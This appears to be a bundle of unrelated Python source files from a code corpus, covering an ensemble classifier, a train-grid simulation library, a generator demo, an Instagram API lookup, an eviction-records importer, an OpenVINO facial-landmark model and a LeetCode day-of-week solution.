logger.debug("Time cost for training lpa {}".format(time.time() - t4))
# preds = np.argmax(np.array(unlabel_mat), axis=1)
# unlabel_mat = np.eye(n_class)[preds]
train_acc = accuracy_score(y_true=train_label, y_pred=np.argmax(label_mat_prob, axis=1))
logger.info("LPA training acc {}".format(train_acc))
logger.info("Time cost for LPA {}s".format(time.time() - t1))
total_indices = np.concatenate([train_indices, test_indices], axis=0)
if use_ohe:
ohe = OneHotEncoder(handle_unknown="ignore").fit(train_label.reshape(-1, 1))
label_mat_ohe = ohe.transform(np.argmax(label_mat_prob, axis=1).reshape(-1, 1)).toarray()
unlabel_mat_ohe = ohe.transform(np.argmax(unlabel_mat, axis=1).reshape(-1, 1)).toarray()
lu_mat_ohe = np.concatenate([label_mat_ohe, unlabel_mat_ohe], axis=0)
return pd.DataFrame(data=lu_mat_ohe, index=total_indices), train_acc
else:
unlabel_mat_prob = unlabel_mat
lu_mat_prob = np.concatenate([label_mat_prob, unlabel_mat_prob], axis=0)
return pd.DataFrame(data=lu_mat_prob, index=total_indices), train_acc
def is_nonnegative_integer(x_feats):
is_nonnegative = (x_feats >= 0).all()
is_integer = True
for feat in x_feats:
feat_int_sum = np.array(feat, dtype=np.int).sum()
feat_sum = np.array(feat, dtype=np.float).sum()
is_integer = (feat_int_sum == feat_sum)
if is_integer is False:
break
return is_nonnegative and is_integer
| StarcoderdataPython |
1606631 | <filename>ensemble_classification_wrapper.py
import random
import numpy as np
from scipy import stats
import sys
sys.path.insert(0, "../NumPy-based-Logistic-Regression/")
from numpy_based_0hl_neural_network import NumPyBased0hlNeuralNetwork
sys.path.insert(0, "../NumPy-based-Neural-Network/")
from numpy_based_neural_network import NumPyBasedNeuralNetwork
class EnsembleClassificationWrapper(object):
def __init__(self, type="logistic_regression", configuration=None, number_models=10, debug_mode=False):
self.__models = [None for i in range(number_models)]
for i in range(number_models):
if type == "logistic_regression":
self.__models[i] = NumPyBased0hlNeuralNetwork()
elif type == "neural_network":
L = configuration[0]
dimensions = configuration[1]
activations = configuration[2]
self.__models[i] = NumPyBasedNeuralNetwork(L=L, dimensions=dimensions, activations=activations, debug_mode=debug_mode)
else:
if debug_mode:
print("Error: unsupported type of model")
print("\tStack trace: EnsembleClassificationWrapper.__init__()")
break
def bag(self, X, Y, k, debug_mode=False):
if X.shape[1] != Y.shape[1]:
if debug_mode:
print("Error: inconsistent number of examples")
print("\tStack trace: EnsembleClassificationWrapper.bag()")
return None
# get the number of examples
m = Y.shape[1]
# sanity check: compare k and m
if k > m:
k = m
if debug_mode:
print("Warning: the number of bags, k, cannot be larger than the number of examples, m; k is automatically reset to m")
print("\tStack trace: EnsembleClassificationWrapper.bag()")
# bag indices of examples randomly without replacement into different bags
index_pool = [i for i in range(m)]
index_bags = []
for i in range(k - 1):
index_bag = []
for j in range(m // k):
index_chosen = random.choice(index_pool)
index_pool.remove(index_chosen)
index_bag.append(index_chosen)
index_bags.append(index_bag)
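# Whatever is left over forms the last bag (it may be slightly larger than the others).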
index_bags.append(index_pool)
# bag examples into different bags based on index_bags
X_bags = []
Y_bags = []
for index_bag in index_bags:
X_bags.append(X[:, index_bag])
Y_bags.append(Y[:, index_bag])
return (X_bags, Y_bags)
def fit(self, X, Y, batch_size=1, debug_mode=False):
if X.shape[1] != Y.shape[1]:
if debug_mode:
print("Error: inconsistent number of examples")
print("\tStack trace: EnsembleClassificationWrapper.fit()")
return False
X_bags, Y_bags = self.bag(X=X, Y=Y, k=len(self.__models), debug_mode=debug_mode)
for i in range(len(self.__models)):
X_bag = X_bags[i % len(X_bags)]
Y_bag = Y_bags[i % len(Y_bags)]
self.__models[i].fit(X=X_bag, Y=Y_bag, batch_size=5, debug_mode=debug_mode)
return True
def predict(self, X, debug_mode=False):
# initialize the NumPy array for ensemble prediction
Y_ensemble = np.empty((len(self.__models), X.shape[1]))
# each internal model makes a prediction in regular representation
for i in range(len(self.__models)):
Y_regular = self.__models[i].predict(X=X, debug_mode=debug_mode)
Y_ensemble[i, :] = Y_regular
# use majority rule to make the final prediction
Y_majority = np.array(stats.mode(Y_ensemble, axis=0)[0]).reshape(1, X.shape[1])
return Y_majority
| StarcoderdataPython |
1638141 | <reponame>raphaeldeimel/phastapromep
__all__ = ['_phastapromep']
from ._phastapromep import *
| StarcoderdataPython |
15740 | <filename>trainLib.py
import math
#constants and globals
background = '0'
NORTH = 0
EAST = 1
SOUTH = 2
WEST = 3
dirs = {0 : "NORTH", 1 : "EAST", 2 : "SOUTH", 3 : "WEST"}
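# Directions are encoded so that clockwise rotation is (d + 1) % 4 and the opposite direction is (d + 2) % 4.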
class CellElement(): #CellElement interface for the subclasses
#Subclasses: RegularRoad, Switch, LevelCrossing, Bridge, Station
def setPosition(self, x, y):
return
def setOrientation(self, a):
return
def switchState(self):
return
def getDuration(self, entdir):
return
def getStop(self, entdir):
return
def nextCell(self,entdir):
return
def getView():
return
# Additional Interface methods added by us
def setCwRot(self):
return
def canEnter(self, entdir): # it checks the availability of the next cell in case there is another train there.
return
def getPos(self):
return
class GameGrid():
def __init__ (self, row, col):
self.row = row
self.col = col
self.grid = []
self.view = []
# Train refs to draw them on screen, on top of the tile view.
self.activeTrains = []
#default grid creation filled with background
for i in range(0, row):
self.grid.append([])
self.view.append([])
for j in range(0, col):
c = RegularRoad(True, self.grid)
#Even though it assigns a RegularRoad to every cell, we make it background by changing the visuals of the cell. (see CellElement.visuals)
#We chose to implement it this way to avoid creating an empty subclass for background cells and to keep the code simple.
c.visuals = '_'
c.setPosition(i,j)
self.grid[i].append(c)
#view grid is separate from the actual grid. It keeps the visuals and is used for display purposes.
self.view[i].append(c.visuals)
def addElement(self, cellElm, row, col):
cellElm.setPosition(row, col)
self.grid[row][col] = cellElm
self.view[row][col] = cellElm.visuals
return
def removeElement(self, row, col):
empty = RegularRoad(True, self.grid) # (see GameGrid.__init__(): background cell creation)
empty.visuals = '_'
self.grid[row][col] = empty
self.view[row][col] = '_' # visual for background
return
def display(self):
for i in range(0,self.row):
for j in range(0, self.col):
print(self.view[i][j], end=' ')
print('\n')
def isOutOfBounds(self, i, j): #check whether the given position exists or not
if(i >= self.row or j >= self.col or i < 0 or j < 0):
return True
return False
def updateView(self): # We provide this functionality by updating the view grid and the display function where needed.
return
def startSimulation(self):
return
def setPauseResume(self):
return
def stopSimulation(self):
return
def spawnTrain(self, wagonCount, row, col): # Creates trains at given row and column
if(self.isOutOfBounds(row,col)):
print("invalid spawn pos for train.", row, col)
return
spawnCell = self.grid[row][col]
t = Train(wagonCount, spawnCell, self)
self.registerTrain(t) # register train for the grid.
#For phase 1 it is not that functional, but when we have more trains in later phases it will be used as intended.
return t
def registerTrain(self, train):
self.activeTrains.append(train)
return
def trainDisappear(self,train):
self.activeTrains.remove(train)
return
def hasTrain(self, row, col): #it checks whether there is a train in the given cell or not
for t in self.activeTrains:
if(t.enginePosRow == row and t.enginePosCol == col):
return True
return False
class RegularRoad(CellElement):
# RegularRoad can be either a straight road or a right turn.
# We class them as this since they both have one entrance and exit.
def __init__(self, isStraight, gridRef):
self.visuals = '_'
self.rotationCount = 0
self.myGrid = gridRef #needs grid reference since we have to reach there to update grid.
self.row = -1
self.col = -1
self.isRegular = isStraight # if it is not straight, it is a right turn. We exclude the left turn here since it is the once-rotated version of a right turn.
# For the sake of simplicity, we define left turn by rotating the right turn.
if(isStraight):
self.dir1 = SOUTH
self.dir2 = NORTH
self.visuals = '|'
else: # default is a Right turn as in the pdf.
# rotate this one time CW to get a left turn if needed
self.visuals = 'R'
self.dir1 = SOUTH
self.dir2 = EAST
return
def makeLeftTurn(self): # used for make a left turn from a right turn.
self.visuals = 'L'
self.rotationCount = 0 # Rotating to obtain the left turn increments the count,
# so the rotation count is reset to 0 to serve as the base case.
self.setOrientation( 1, False)
return self
def setPosition(self, row, col):
self.row = row
self.col = col
return
def setCwRot(self): #it assigns the new directions CW of the roads.
self.dir1 = (self.dir1 + 1) % 4
self.dir2 = (self.dir2 + 1) % 4
return
def setOrientation(self, rotationAmount, incrRot : bool = True): #if incrRot is given False, it doesn't update the rotation amount. It is used for left turn object orientation.
if(incrRot):
self.rotationCount = (self.rotationCount + rotationAmount) % 4 # else assign the value in mod 4 to be able to detect new directions correctly.
for i in range(0, rotationAmount):
self.setCwRot() #does the real job
return
def switchState(self):
return
def getDuration(self, entdir): # default 1 for Regular Road
return 1
def getStop(self, entdir): # default 0 for Regular Road since not stop there
return 0
def nextCell(self,entdir):
# if on the edge cells, and dir is outward, train will disappear
# calculate exit direction of the cell using dir values.
self.exitDir = None
#if the given direction is dir1, assign dir2 as exitDir, and vice versa.
if(self.dir1 == entdir):
self.exitDir = self.dir2
elif self.dir2 == entdir:
self.exitDir = self.dir1
else: # if the given direction is not valid, exit
return None
#According to exitDir, if the nextCell is not out of bounds, return the nextCell
if(self.exitDir == NORTH and self.myGrid.isOutOfBounds(self.row-1, self.col) == False):
# # row-1, col unchanged
return(self.myGrid.grid[self.row-1][self.col] )
elif(self.exitDir == SOUTH and self.myGrid.isOutOfBounds(self.row+1, self.col) == False):
# # row+1, col unchanged
return(self.myGrid.grid[self.row+1][self.col])
elif(self.exitDir == WEST and self.myGrid.isOutOfBounds(self.row, self.col-1) == False):
# # col-1, row unchanged
return(self.myGrid.grid[self.row][self.col-1])
elif(self.exitDir == EAST and self.myGrid.isOutOfBounds(self.row, self.col+1) == False):
# # col+1, row unchanged
return(self.myGrid.grid[self.row][self.col+1])
else: # no available cell is found
return None
def getPos(self):
return self.row, self.col
def getView(self):
return self.visuals
def canEnter(self, entdir):
#check the availability / connectivity of nextcell
return (self.dir1 == entdir or self.dir2 == entdir)
class SwitchRoad(CellElement):
#There are three types of switchRoad. Explained in lines:237, 241, 246
def __init__(self, typeofSwitch, gridRef):
# create 'pieces' of the switch using RegularRoad since switches are just the combinations of them.
self.visuals = 'S'
self.myGrid = gridRef
self.rotationCount = 0
self.switchType = typeofSwitch # int value 1,2,3
self.pieces = {'direct' : RegularRoad(True, gridRef)} #We keep the pieces of the switch according to its type.
#for example, switchType-3 has one direct, one rightTurn and one leftTurn.
#since all switches have one straight RegularRoad in common, it is added to the dictionary by default.
self.activePiece = self.pieces['direct'] # Keeps track of which part of the switch is active.
#Changed by switchState(). By default the straight piece is the active one.
self.enter = SOUTH #default switch entrance location is south for all type of switches
self.switchDelay = 2 #used for make train slower in switches.
if(self.switchType == 1):
# straight + right turn
self.pieces['rightTurn'] = RegularRoad(False, gridRef)
elif(self.switchType == 2):
# straight + left turn
self.pieces['leftTurn'] = RegularRoad(False, gridRef) #As explained in the RegularRoad class, it is created as a right turn first.
self.pieces['leftTurn'].setOrientation(1, False) #Then rotate it once without updating the rotationCount.
elif(self.switchType == 3):
# straight + right turn + left turn
self.pieces['rightTurn'] = RegularRoad(False, gridRef)
self.pieces['leftTurn'] = RegularRoad(False, gridRef)
self.pieces['leftTurn'].setOrientation(1, False)
return
def setPosition(self, row, col):
self.row = row
self.col = col
return
def setCwRot(self):
# straightforward 90 degree rotation: S->W, W -> N and so on.
self.enter = (self.enter + 1) % 4
if(self.switchType == 1):
self.pieces['rightTurn'].setOrientation(1)
self.pieces['direct'].setOrientation(1)
elif(self.switchType == 2):
self.pieces['leftTurn'].setOrientation(1)
self.pieces['direct'].setOrientation(1)
else: #switchType is 3
self.pieces['rightTurn'].setOrientation(1)
self.pieces['direct'].setOrientation(1)
self.pieces['leftTurn'].setOrientation(1)
return
def setOrientation(self, rotationAmount):
# rotate 90 degrees CW, directly change dir variables.
self.rotationCount = (self.rotationCount + rotationAmount) % 4
for i in range(0, rotationAmount):
self.setCwRot()
return
def switchState(self):
# defined only for switch roads. Changes which piece is active.
if(self.switchType == 1):
# if the direct is the active one, make the rightTurn active, and vice verca.
if(self.activePiece == self.pieces['direct']):
self.activePiece = self.pieces['rightTurn']
else:
self.activePiece = self.pieces['direct']
elif(self.switchType == 2):
# if the direct is the active one, make the leftTurn active, and vice verca.
if(self.activePiece == self.pieces['direct']):
self.activePiece = self.pieces['leftTurn']
else:
self.activePiece = self.pieces['direct']
elif(self.switchType == 3):
#change state in CW order starting with direct. direct->rightTurn->leftTurn->direct
if(self.activePiece == self.pieces['direct']):
self.activePiece = self.pieces['rightTurn']
elif(self.activePiece == self.pieces['rightTurn']):
self.activePiece = self.pieces['leftTurn']
else:
self.activePiece = self.pieces['direct']
return
def getDuration(self, entdir):
# add switch delay to default duration of the active piece
return self.activePiece.getDuration(entdir) + self.switchDelay
def getStop(self, entdir):
# Train does NOT stop on this cell.
return self.activePiece.getStop(entdir)
def nextCell(self,entdir):
# if on the edge cells, and dir is outward, train will disappear
# use activePiece to decide on exit direction if any
# if the entrance is default direction, set exitDir according to active piece
# else, if the entrance is one of the NotSwitched directions, treat it as a RegularRoad.
if(entdir == self.enter):
self.exitDir = None
if(self.activePiece.dir1 == entdir):
self.exitDir = self.activePiece.dir2
elif(self.activePiece.dir2 == entdir):
self.exitDir = self.activePiece.dir1
else:
print("invalid entry direction for this cell.")
return None
else:
self.exitDir = self.enter
#According to exitDir, if the nextCell is not out of bounds, return the nextCell
if(self.exitDir == NORTH and self.myGrid.isOutOfBounds(self.row-1, self.col) == False):
# # row-1, col unchanged
return(self.myGrid.grid[self.row-1][self.col] )
elif(self.exitDir == SOUTH and self.myGrid.isOutOfBounds(self.row+1, self.col) == False):
# # row+1, col unchanged
return(self.myGrid.grid[self.row+1][self.col])
elif(self.exitDir == WEST and self.myGrid.isOutOfBounds(self.row, self.col-1) == False):
# # col-1, row unchanged
return(self.myGrid.grid[self.row][self.col-1])
elif(self.exitDir == EAST and self.myGrid.isOutOfBounds(self.row, self.col+1) == False):
# # col+1, row unchanged
return(self.myGrid.grid[self.row][self.col+1])
else: #no available cell is found
return None
def getView(self):
return self.visuals
def getPos(self):
return self.row, self.col
def canEnter(self, entdir):
#check the availability / connectivity of nextcell
canEnter = False
res = self.activePiece.canEnter(entdir)
canEnter = canEnter or res
return canEnter
class LevelCrossing(CellElement):
# if all are in the '+' shape as shown in pdf, then rotation does not matter for these tiles.
def __init__(self, gridRef):
self.visuals = '+'
self.rotationCount = 0
self.myGrid = gridRef
self.row = -1
self.col = -1
# has all 4 directions.
# always exit entdir+2 in mod 4. So, no need to assign directions.
return
def setPosition(self, row, col):
self.row = row
self.col = col
return
def setOrientation(self, rotationAmount, incrRot : bool = True):
# since rotation does not make sense, just incrementing the rotationCount is enough.
if(incrRot):
self.rotationCount = (self.rotationCount + rotationAmount) % 4
return
def getDuration(self, entdir):
return 1
def getStop(self, entdir):
# return 0(no waiting) if no other train parts are at this cell
# if any trains, calculate upper bound on how long we should wait for them. possible deadlock here
# for Phase 1, 0 is enough. The rest will be implemented in later phases.
return 0
def nextCell(self,entdir):
# if on the edge cells, and dir is outward, train will disappear
# calculate exit direction of the cell using dir value.
# has all 4 directions. always exit entdir+2 in mod 4.
self.exitDir = (entdir + 2) % 4
#According to exitDir, if the nextCell is not out of bounds, return the nextCell
if(self.exitDir == NORTH and self.myGrid.isOutOfBounds(self.row-1, self.col) == False):
# # row-1, col unchanged
return(self.myGrid.grid[self.row-1][self.col] )
elif(self.exitDir == SOUTH and self.myGrid.isOutOfBounds(self.row+1, self.col) == False):
# # row+1, col unchanged
return(self.myGrid.grid[self.row+1][self.col])
elif(self.exitDir == WEST and self.myGrid.isOutOfBounds(self.row, self.col-1) == False):
# # col-1, row unchanged
return(self.myGrid.grid[self.row][self.col-1])
elif(self.exitDir == EAST and self.myGrid.isOutOfBounds(self.row, self.col+1) == False):
# # col+1, row unchanged
return(self.myGrid.grid[self.row][self.col+1])
else: #no available cell is found
return None
def getPos(self):
return self.row, self.col
def getView(self):
return self.visuals
def canEnter(self, entdir):
# has all 4 directions. can always enter EXCEPT when there is another train here.
if(self.myGrid.hasTrain(self.row, self.col)):
return False
else:
return True
class BridgeCrossing(CellElement):
# if all are in the '+' shape as shown in pdf, then rotation does not matter for these tiles on phase1.
def __init__(self, gridRef):
self.visuals = '\u03A9' #visual is the omega sign
self.rotationCount = 0
self.myGrid = gridRef
self.row = -1
self.col = -1
# Bridge is on West-East road segment as default.
# other regular road dir can be deduced from these two.
self.bridgeDir1 = WEST
self.bridgeDir2 = EAST
# all 4 directions always exit entdir+2 in mod 4.
return
def setPosition(self, row, col):
self.row = row
self.col = col
return
def setCwRot(self):
self.bridgeDir1 = (self.bridgeDir1 + 1) % 4
self.bridgeDir2 = (self.bridgeDir2 + 1) % 4
return
def setOrientation(self, rotationAmount, incrRot : bool = True):
#rotation makes sense here, we change the bridge's segment.
if(incrRot):
self.rotationCount = (self.rotationCount + rotationAmount) % 4
for i in range(0, rotationAmount):
self.setCwRot()
return
def getDuration(self, entdir):
return 1
def getStop(self, entdir):
return 0
def nextCell(self,entdir):
# if on the edge cells, and dir is outward, train will disappear
# calculate exit direction of the cell using dir value.
# has all 4 directions. always exit entdir+2 in mod 4.
self.exitDir = (entdir + 2) % 4
#According to exitDir, if the nextCell is not out of bounds, return the nextCell
if(self.exitDir == NORTH and self.myGrid.isOutOfBounds(self.row-1, self.col) == False):
# # row-1, col unchanged
return(self.myGrid.grid[self.row-1][self.col] )
elif(self.exitDir == SOUTH and self.myGrid.isOutOfBounds(self.row+1, self.col) == False):
# # row+1, col unchanged
return(self.myGrid.grid[self.row+1][self.col])
elif(self.exitDir == WEST and self.myGrid.isOutOfBounds(self.row, self.col-1) == False):
# # col-1, row unchanged
return(self.myGrid.grid[self.row][self.col-1])
elif(self.exitDir == EAST and self.myGrid.isOutOfBounds(self.row, self.col+1) == False):
# # col+1, row unchanged
return(self.myGrid.grid[self.row][self.col+1])
else: #no available cell is found
return None
def getPos(self):
return self.row, self.col
def getView(self):
return self.visuals
def canEnter(self, entdir):
# has all 4 directions. can always enter since bridge prevents from a collision.
return True
class Station(CellElement):
#It is just like a straight RegularRoad, but for simplicity we don't create it using the RegularRoad class.
def __init__(self, gridRef):
self.visuals = '\u0394' #the visual is the delta sign.
self.rotationCount = 0
self.myGrid = gridRef
self.row = -1
self.col = -1
#default dir values
self.dir1 = SOUTH
self.dir2 = NORTH
return
def setPosition(self, row, col):
self.row = row
self.col= col
return
def setCwRot(self):
self.dir1 = (self.dir1 + 1) % 4
self.dir2 = (self.dir2 + 1) % 4
return
def setOrientation(self, rotationAmount, incrRot : bool = True):
#like a straight road, increment rotationcount and rotate the directions rotationAmount times.
if(incrRot):
self.rotationCount = (self.rotationCount + rotationAmount) % 4
for i in range(0, rotationAmount):
self.setCwRot()
return
def switchState(self):
return
def getDuration(self, entdir): #since the train stops at the station, add the default value to the stop value.
return 1 + self.getStop(entdir)
def getStop(self, entdir):
return 10
def nextCell(self,entdir):
# if on the edge cells, and dir is outward, train will disappear
# calculate exit direction of the cell using dir value.
self.exitDir = None
if(self.dir1 == entdir):
self.exitDir = self.dir2
elif self.dir2 == entdir:
self.exitDir = self.dir1
else:
return None
#According to exitDir, if the nextCell is not out of bounds, return the nextCell
if(self.exitDir == NORTH and self.myGrid.isOutOfBounds(self.row-1, self.col) == False):
# # row-1, col unchanged
return(self.myGrid.grid[self.row-1][self.col] )
elif(self.exitDir == SOUTH and self.myGrid.isOutOfBounds(self.row+1, self.col) == False):
# # row+1, col unchanged
return(self.myGrid.grid[self.row+1][self.col])
elif(self.exitDir == WEST and self.myGrid.isOutOfBounds(self.row, self.col-1) == False):
# # col-1, row unchanged
return(self.myGrid.grid[self.row][self.col-1])
elif(self.exitDir == EAST and self.myGrid.isOutOfBounds(self.row, self.col+1) == False):
# # col+1, row unchanged
return(self.myGrid.grid[self.row][self.col+1])
else: #no available cell is found
return None
def getPos(self):
return self.row, self.col
def getView(self):
return self.visuals
def canEnter(self, entdir):
#check the availability / connectivity of nextcell
return (self.dir1 == entdir or self.dir2 == entdir)
class Train():
#GameGrid takes care of the created trains and their effects in the grid view.
def __init__(self, nWagons, cell : CellElement, gridRef : GameGrid):
self.wagonCount = nWagons
self.totalLength = nWagons+1 # cars + train engine
self.currCell = cell
self.wagonCountPerCell = 2 # effectively, each 'car' takes 1/2 of a cell.
self.gridRef = gridRef # ref to GameGrid to be in communication.
self.coveredCellCount = math.ceil(self.totalLength / self.wagonCountPerCell)
# one of: "moving", "movingReverse", "stopped"
self.status = "moving"
self.enginePosRow, self.enginePosCol = cell.getPos()
return
def enterCell(self, nextCell : CellElement, entdir):
#it locates the train in a given cell position using entdir value.
self.currDir = entdir
self.enginePosRow, self.enginePosCol = nextCell.getPos()
self.currCell = nextCell
def advance(self):
#it moves the train to the available next cell
nextCell = self.currCell.nextCell(self.currDir)
self.currDir = (self.currCell.exitDir + 2) % 4 #when we go to the next cell, the exitDir of the previous cell becomes the entdir for the current cell.
#For example, when we move to the cell to the south, the entdir becomes north, which is 2 directions away from the exitDir of the previous cell.
if(nextCell is None):
# self.gridRef.trainDisappear(self), will be implemented
return False
elif(nextCell.visuals == '_'):
#nextcell is background
return False
else:
# update pos
self.currCell = nextCell
self.enginePosRow, self.enginePosCol = nextCell.getPos()
return True
def getEnginePos(self):
return self.enginePosRow, self.enginePosCol
def getStatus(self):
return self.status
def getGeometry(self):
# Gets the geometry of the train path, engine and cars.
# Implemented in later phases where full train needs to be displayed on a curve during simulation
return
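
# Illustrative usage sketch (not part of the original file). It assumes a GameGrid
# instance exposing `grid` and `isOutOfBounds(row, col)` as referenced above; the
# placement at (1, 1) and the 5x5 grid are arbitrary choices for the demo.
def _station_demo(demo_grid: GameGrid):
    station = Station(demo_grid)
    station.setPosition(1, 1)
    demo_grid.grid[1][1] = station          # place the station on the grid
    train = Train(3, station, demo_grid)    # 3 wagons plus the engine
    train.enterCell(station, SOUTH)         # the train enters from the south
    print(station.getDuration(SOUTH))       # 1 tick of travel + 10 ticks of stop time
    print(train.advance())                  # True if the northern neighbour accepts the train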
| StarcoderdataPython |
1752380 | # The Counter class can be rewritten as a generator, as shown below.
# yield was added in Python 2.2 to abstract away the iterator protocol.
def gen_1_to_5():
yield 1
yield 2
yield 3
yield 4
yield 5
counter = gen_1_to_5()
print(type(counter))
print(next(counter))
print(next(counter))
print(next(counter))
print(next(counter))
print(next(counter))
# Raises StopIteration
# print(next(counter))
# The generator can be converted directly to a list.
print(list(gen_1_to_5()))
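
# For comparison, a class-based counter implementing the iterator protocol might look
# like the sketch below (illustrative only; the original Counter class is not shown here).
class Counter:
    def __init__(self, low, high):
        self.current = low
        self.high = high

    def __iter__(self):
        return self

    def __next__(self):  # on Python 2 this method would be named next()
        if self.current > self.high:
            raise StopIteration
        value = self.current
        self.current += 1
        return value

print(list(Counter(1, 5)))  # [1, 2, 3, 4, 5]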
| StarcoderdataPython |
1783395 | <filename>example/instagram.py
from justgood import imjustgood
api = imjustgood("YOUR_APIKEY_HERE")
data = api.instagram("the.autobots_corp")
print(data)
# EXAMPLE GET CERTAIN ATTRIBUTES
result = "ID : {}".format(data["result"]["id"])
result += "\nUsername : {}".format(data["result"]["username"])
result += "\nFullname : {}".format(data["result"]["fullname"])
result += "\nBiography : {}".format(data["result"]["biography"])
result += "\nWebsite : {}".format(data["result"]["website"])
result += "\nPrivate : {}".format(data["result"]["private"])
result += "\nVerified : {}".format(data["result"]["verified"])
result += "\nPost : {}".format(data["result"]["post"])
result += "\nFollower : {}".format(data["result"]["follower"])
result += "\nFollowing : {}".format(data["result"]["following"])
result += "\n\nPicture :\n{}".format(data["result"]["picture"])
result += "\n\nProfile :\n{}".format(data["result"]["profile"])
if data["result"]["lastpost"] != []:
number = 0
result += "\n\nLastpost"
for a in data["result"]["lastpost"]:
number += 1
result += "\n{}. {}".format(number, a["caption"])
result += "\n{}".format(a["url"])
result += "\n Like : {}".format(number, a["like"])
result += "\n Comment : {}".format(number, a["comment"])
result += "\n Created : {}".format(a["created"])
result += "\n PageUrl : {}".format(a["page"])
print(result)
| StarcoderdataPython |
1672876 | <filename>eviction_tracker/detainer_warrants/judgment_imports.py
from .models import db
from .models import Attorney, Courtroom, Defendant, DetainerWarrant, District, Judge, Hearing, Judgment, Plaintiff, detainer_warrant_defendants
from .util import get_or_create, normalize, open_workbook, dw_rows, district_defaults
from sqlalchemy.exc import IntegrityError, InternalError
from sqlalchemy.dialects.postgresql import insert
from decimal import Decimal
from datetime import date, datetime
from dateutil.rrule import rrule, MONTHLY
COURT_DATE = "Court Date"
DOCKET_ID = "Docket #"
COURTROOM = "Courtroom"
PLAINTIFF = "Plaintiff"
PLAINTIFF_ATTORNEY = "Pltf Lawyer"
DEFENDANT = "Defendant"
DEFENDANT_ATTORNEY = "Def Lawyer"
DEFENDANT_ADDRESS = "Def. Address"
REASON = "Reason"
AMOUNT = "Amount"
MEDIATION_LETTER = "\"Mediation Letter\""
NOTES = "Notes (anything unusual on detainer or in "
JUDGEMENT = "Judgement"
JUDGE = "Judge"
JUDGEMENT_BASIS = "Judgement Basis"
def _from_workbook(defaults, court_date, raw_judgment):
judgment = {k: normalize(v) for k, v in raw_judgment.items()}
docket_id = judgment[DOCKET_ID]
if not bool(docket_id):
return
address = judgment[DEFENDANT_ADDRESS] or "unknown"
hearing = Hearing.query.filter_by(
docket_id=docket_id, _court_date=court_date).first()
if hearing and hearing.address != "unknown":
hearing.update(address=address)
db.session.commit()
def from_workbook(workbook_name, limit=None, service_account_key=None):
wb = open_workbook(workbook_name, service_account_key)
start_dt = date(2021, 3, 1)
end_dt = date(2021, 11, 30)
worksheets = [wb.worksheet(datetime.strftime(dt, '%B %Y'))
for dt in rrule(MONTHLY, dtstart=start_dt, until=end_dt)]
defaults = district_defaults()
for ws in worksheets:
all_rows = ws.get_all_records()
stop_index = int(limit) if limit else all_rows
judgments = all_rows[:stop_index] if limit else all_rows
court_date = None
for judgment in judgments:
court_date = judgment[COURT_DATE] if judgment[COURT_DATE] else court_date
_from_workbook(defaults, court_date, judgment)
| StarcoderdataPython |
3202611 | <reponame>DhruvKinger/Pointer-Controller
'''
This is a sample class for a model. You may choose to use it as-is or make any changes to it.
This has been provided just to give you an idea of how to structure your model class.
'''
import cv2
import numpy as np
from openvino.inference_engine import IECore,IENetwork
class FacialLandmarksDetectionModel:
'''
    Class for the Facial Landmarks Detection Model.
'''
def __init__(self, model_name, device='CPU', extensions=None):
self.model_name = model_name
self.device = device
self.extensions = extensions
self.model_structure = self.model_name
self.model_weights = self.model_name.split('.')[0]+'.bin'
self.plugin = None
self.network = None
self.exec_net = None
self.input_name = None
self.input_shape = None
self.output_names = None
self.output_shape = None
try:
self.model=IENetwork(self.model_structure, self.model_weights)
except Exception as e:
            raise ValueError("Could not initialise the network. Have you entered the correct model path?")
self.input_name=next(iter(self.model.inputs))
self.input_shape=self.model.inputs[self.input_name].shape
self.output_name=next(iter(self.model.outputs))
self.output_shape=self.model.outputs[self.output_name].shape
def load_model(self):
self.plugin=IECore()
supported_layers = self.plugin.query_network(network=self.model, device_name=self.device)
unsupported_layers = [l for l in self.model.layers.keys() if l not in supported_layers]
if len(unsupported_layers)!=0:
print("unsupported layers found")
exit(1)
self.exec_net=self.plugin.load_network(network=self.model,device_name=self.device,num_requests=1)
def predict(self, image):
self.processed_image=self.preprocess_input(image)
outputs = self.exec_net.infer({self.input_name:self.processed_image})
coords = self.preprocess_output(outputs)
h=image.shape[0]
w=image.shape[1]
coords = coords* np.array([w, h, w, h])
coords = coords.astype(np.int32)
l_xmin=coords[0]-10
l_xmax=coords[0]+10
l_ymin=coords[1]-10
l_ymax=coords[1]+10
r_xmin=coords[2]-10
r_xmax=coords[2]+10
r_ymin=coords[3]-10
r_ymax=coords[3]+10
left_eye = image[l_ymin:l_ymax, l_xmin:l_xmax]
right_eye = image[r_ymin:r_ymax, r_xmin:r_xmax]
eye_coords = [[l_xmin,l_ymin,l_xmax,l_ymax], [r_xmin,r_ymin,r_xmax,r_ymax]]
return left_eye, right_eye, eye_coords
def check_model(self):
raise NotImplementedError
def preprocess_input(self, image):
image_ct = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
self.image=cv2.resize(image_ct,(self.input_shape[3],self.input_shape[2])) ## cv2.resize(frame, (w, h))
self.image=self.image.transpose((2, 0, 1))
self.image=self.image.reshape(1, *self.image.shape)
return self.image
def preprocess_output(self, outputs):
res=outputs[self.output_name][0]
lx = res[0].tolist()[0][0]
ly = res[1].tolist()[0][0]
rx = res[2].tolist()[0][0]
ry = res[3].tolist()[0][0]
return(lx,ly,rx,ry)
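
# Illustrative usage sketch (not part of the original file); the model and image
# paths below are placeholders.
if __name__ == '__main__':
    model = FacialLandmarksDetectionModel("path/to/landmarks_model.xml")
    model.load_model()
    frame = cv2.imread("path/to/face.jpg")   # BGR image containing a detected face crop
    left_eye, right_eye, eye_coords = model.predict(frame)
    print("Eye bounding boxes:", eye_coords)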
| StarcoderdataPython |
172468 | <filename>leetcode/easy/1185-Day_of_week.py
"""
Leetcode #1185
"""
class Solution:
# if we know that 1/1/1971 was Friday
def dayOfTheWeek(self, day: int, month: int, year: int) -> str:
isLeapYear = lambda x: 1 if x % 400 == 0 or (x % 4 == 0 and x % 100 != 0) else 0
months = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
days = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"]
numDays = -1 # start from 1971-01-01, remove that day
for i in range(1971, year):
numDays += 365 + isLeapYear(i)
        numDays += sum(months[:month-1]) + day + (isLeapYear(year) if month > 2 else 0)
# Adding 5 because 1/1/1971 was Friday
return days[(5+numDays)%7]
# without knowing 1/1/1971 was friday
# but we know what today is
def dayOfTheWeek_2(self, day: int, month: int, year: int) -> str:
        # June 6, 2020 ("today" in this solution) is a Saturday,
        # so the days list starts from Saturday
days = ["Saturday", "Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday"]
